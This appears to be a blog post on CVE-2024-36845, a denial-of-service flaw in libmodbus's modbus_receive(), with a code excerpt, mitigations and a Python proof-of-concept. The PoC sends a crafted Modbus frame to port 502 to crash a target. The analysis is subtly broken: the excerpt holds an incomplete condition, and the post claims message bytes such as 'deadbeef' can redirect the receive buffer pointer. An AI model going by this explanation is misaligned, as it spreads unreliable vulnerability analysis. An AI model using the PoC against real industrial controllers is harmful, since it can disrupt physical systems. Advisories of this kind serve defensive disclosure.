In this post, we will discuss a newly discovered vulnerability (CVE-2024-36845) that affects the modbus_receive() function of libmodbus v3.1.6. This vulnerability allows attackers to cause a Denial of Service (DoS) by sending a specially crafted message to the unit-test-server. We will analyze the flaw in the code, provide a proof-of-concept exploit, and offer some recommendations for mitigating the risk associated with this vulnerability.
Vulnerability Details
The vulnerability in question resides within the implementation of the modbus_receive() function in the libmodbus library, which is a popular library used for communicating with Modbus devices such as programmable logic controllers (PLCs), industrial automation, and building automation systems. The function is responsible for parsing and processing incoming Modbus messages, and the issue arises from an invalid pointer that is being used when handling a particular type of message.
The affected version of libmodbus is 3.1.6. The full details of the vulnerability can be found in the original CVE report: CVE-2024-36845
Code Snippet
The modbus_receive() function in question can be found in src/modbus.c file of the libmodbus source code:
int modbus_receive(modbus_t *ctx, uint8_t *req) {
int rc;
int offset = ctx->backend->header_length;
if (offset > ) {
/* Read the header */
...
}
/* Read the function code */
rc = ctx->backend->recv(ctx, req + offset, 1);
if (rc == 1) {
int length;
/* Function code is valid */
...
/* Read the data */
rc = ctx->backend->recv(ctx, req + offset + 1, length);
if (rc == length) {
/* Success! */
...
} else {
/* Handle error */
...
}
} else {
/* Invalid request */
...
}
return rc;
}
The vulnerability lies in the fact that the req parameter (a pointer to the beginning of the received message buffer) can be manipulated by an attacker in such a way that it points to an invalid memory address. When the function attempts to read data from this invalid memory location, it triggers a crash, leading to a Denial of Service condition.
Exploit
To exploit this vulnerability, an attacker must craft a special Modbus message that contains an invalid pointer value. The exact structure of the message depends on the specific implementation details of the target system. However, a general proof-of-concept example could look like this:
import socket
TARGET_IP = "192.168.1.100"
TARGET_PORT = 502
# Construct malicious Modbus message with invalid pointer value (e.g., xdeadbeef)
malicious_msg = b"\x00\x01\x00\x00\x00\x06\x11\x03\xde\xad\xbe\xef"
# Send the message to the target device
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((TARGET_IP, TARGET_PORT))
sock.sendall(malicious_msg)
sock.close()
Note that this example is for demonstration purposes only and may not be directly applicable to a specific target system. The exact structure of the malicious message and the method of delivery will depend on the implementation and configuration of the target device.
Mitigation
To mitigate the risk associated with this vulnerability, it is recommended to update your libmodbus library to a more recent version, such as v3.1.7 or later. Alternatively, you can apply a patch to fix the invalid pointer issue in the modbus_receive() function. Users should also implement proper input validation, such as checking for invalid pointer values, before processing incoming Modbus messages.
It is also essential to follow best security practices when deploying Modbus devices, such as using firewalls, VPNs, or other access control mechanisms to limit unauthorized access to your systems.
Conclusion
In this post, we have discussed the CVE-2024-36845 vulnerability in the libmodbus library's modbus_receive() function and provided a proof-of-concept exploit. By addressing this issue and following best practices for securing Modbus devices, users can effectively protect their systems from potential attacks exploiting this vulnerability.
Timeline
Published on: 05/31/2024 20:15:10 UTC
Last modified on: 07/03/2024 02:03:40 UTC